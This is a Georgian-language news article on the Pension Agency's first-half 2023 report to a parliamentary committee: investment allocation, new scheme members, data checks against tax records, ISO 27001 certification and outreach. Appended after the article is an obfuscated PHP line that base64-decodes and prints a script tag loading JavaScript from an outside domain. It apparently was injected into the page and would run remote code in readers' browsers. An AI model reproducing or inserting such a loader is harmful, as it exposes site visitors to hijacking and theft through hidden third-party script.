celsiusi
ავერსი საქკაბელი

საქართველოს პარლამენტის საფინანსო-საბიუჯეტო კომიტეტის სხდომაზე საპენსიო სააგენტოს დირექტორის მოვალეობის შემსრულებელმა გიორგი ჭიჭინაძემ საპენსიო სააგენტოს 2023 წლის ექვსი თვის საქმიანობის ანგარიში წარადგინა.

ანგარიში მოიცავდა, როგორც საინვესტიციო საქმიანობის, ისე ადმინისტრაციული საქმიანობის შესახებ ინფორმაციას. საინვესტიციო პორტფელების მართვის ინფრასტრუქტურის შექმნის მიზნით, საინვესტიციო სამსახურმა 2023 წლის პირველ ნახევარში შეიმუშავა წინადადების მოთხოვნის დოკუმენტი, რომელიც დაეგზავნა 20-მდე საერთაშორისო, მაღალი რეპუტაციის მქონე კომპანიას.

„2023 წლის პირველ ნახევარში, საინვესტიციო სამსახური განაგრძობდა აქტიურ ინვესტირებას, როგორც საერთაშორისო, ისე ადგილობრივ კაპიტალის ბაზრებზე. 2023 წლის მარტიდან საინვესტიციო სამსახურმა დაიწყო უცხოური აქციების პორტფელის დამატებით დივერსიფიკაცია და განვითარებული ქვეყნების აქციების ინდექსებთან ერთად მსხვილი განვითარებადი ეკონომიკების აქციების ინდექსების ფონდებიც შეიძინა. ამასთან, საინვესტიციო პორტფელის დივერსიფიცირების, ამონაგების გაზრდისა და ასევე ადგილობრივი კაპიტალის ბაზრების ხელშეწყობის მიზნით“- განაცხადა გიორგი ჭიჭინაძემ.

რაც შეეხება პორტფელის განაწილებას ინსტრუმენტების მიხედვით, საანგარიშო პერიოდის ბოლოს 46.4% განთავსებული იყო 7 ქართულ კომერციულ ბანკში სადეპოზიტო სერტიფიკატებსა და ვადიან ანაბრებში, რომელთაც ერიცხებათ ფიქსირებული სარგებელი, ხოლო 16.2% ნომინალური მფლობელობის სარგებლიან მიმდინარე ანგარიშებზე, რომლებსაც ერიცხება ცვლადი სარგებელი. უცხოურ აქციებში ინვესტირებული იყო პორტფელის 17.4%, აშშ-ის სახაზინო ვალდებულებებში 1.2%, ხოლო საქართველოს სახაზინო ფასიანი ქაღალდების წილი პორტფელის 17.6%-ს შეადგენდა. საპენსიო აქტივების 0.6% ევროობლიგაციებში იყო განთავსებული, 0.4% კი ადგილობრივ კორპორაციულ ობლიგაციაში. 2023 წლის 30 ივნისის მდგომარეობით, საპენსიო აქტივების 90.3% განთავსებული იყო მინიმუმ ქვეყნის საკრედიტო რეიტინგზე 1 საფეხურით ნაკლები რეიტინგის მქონე კომერციულ ბანკებში და ფასიან ქაღალდებში. 2023 წლის 30 ივნისის მდგომარეობით, საპენსიო აქტივების განაწილება აკმაყოფილებდა კანონითა და საინვესტიციო პოლიტიკის დოკუმენტით დადგენილ ლიმიტებს, მათ შორის: წილობრივ ფასიან ქაღალდებსა და უცხოურ ვალუტაში აქტივების განთავსების ლიმიტს, საკრედიტო რეიტინგის, ბანკის საერთო კაპიტალისა და კონცენტრაციის შეზღუდვებს.

 

2023 წლის 1 იანვრიდან 30 ივნისის ჩათვლით საანგარიშო პერიოდში საპენსიო შენატანების ადმინისტრირების ელექტრონულ სისტემაში დარეგისტრირდა 6,556 დამსაქმებელი და თვითდასაქმებული, გაწევრიანდა 57,286 დასაქმებული. ჯამურად, 2019-2023 წლებში 4,511 პირზე გაცემულმა თანხამ  შეადგინა 11,337,399.66 ლარი.

2023 წლის პირველ ნახევარში დაიწყო დამსაქმებლების მიერ საპენსიო სააგენტოსა და შემოსავლების სამსახურის მონაცემთა ბაზებში წარდგენილი ინფორმაციების სისტემატიური შედარება და შეუსაბამობების გამოვლენა. გამოვლენილი შეუსაბამობების შესახებ ეცნობათ შესაბამის დამსაქმებლებს და დაგროვებით საპენსიო სქემაში გაწევრიანებულ დასაქმებულებს.

სააგენტომ მიიღო ISO 27001 სერტიფიკატი, რაც დაგროვებით საპენსიო სქემაში მონაწილეთა ინტერესების მაქსიმალური დაცვის, სააგენტოს მიმართ ნდობისა და რეპუტაციის ზრდის წინაპირობაა. აღნიშნული ფაქტი ნათელი მაგალითია იმისა, რომ სააგენტოში რისკების კონტროლი მიმდინარეობს  საერთაშორისო საუკეთესო პრაქტიკის შესაბამისად.

საზოგადოებასთან ურთიერთობა საპენსიო სააგენტოსთვის, სქემაში ჩართული პირებისთვის ინფორმაციის მიწოდება და მაქსიმალური გამჭვირვალობა ერთ-ერთი მნიშვნელოვან ამოცანას წარმოადგენს. შესაბამისად, 2023 წლის 6 თვის განმავლობაში გამოქვეყნდა 277 სატელევიზიო, რადიო, ონლაინ და ბეჭდური მასალა. ჩატარდა საინფორმაციო შეხვედრები  საფინანსო სფეროს ექსპერტებთან, ბიზნეს სექტორთან, მედიასთან, უნივერსიტეტის სტუდენტებთან და სკოლის მოსწავლეებთან.

265
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");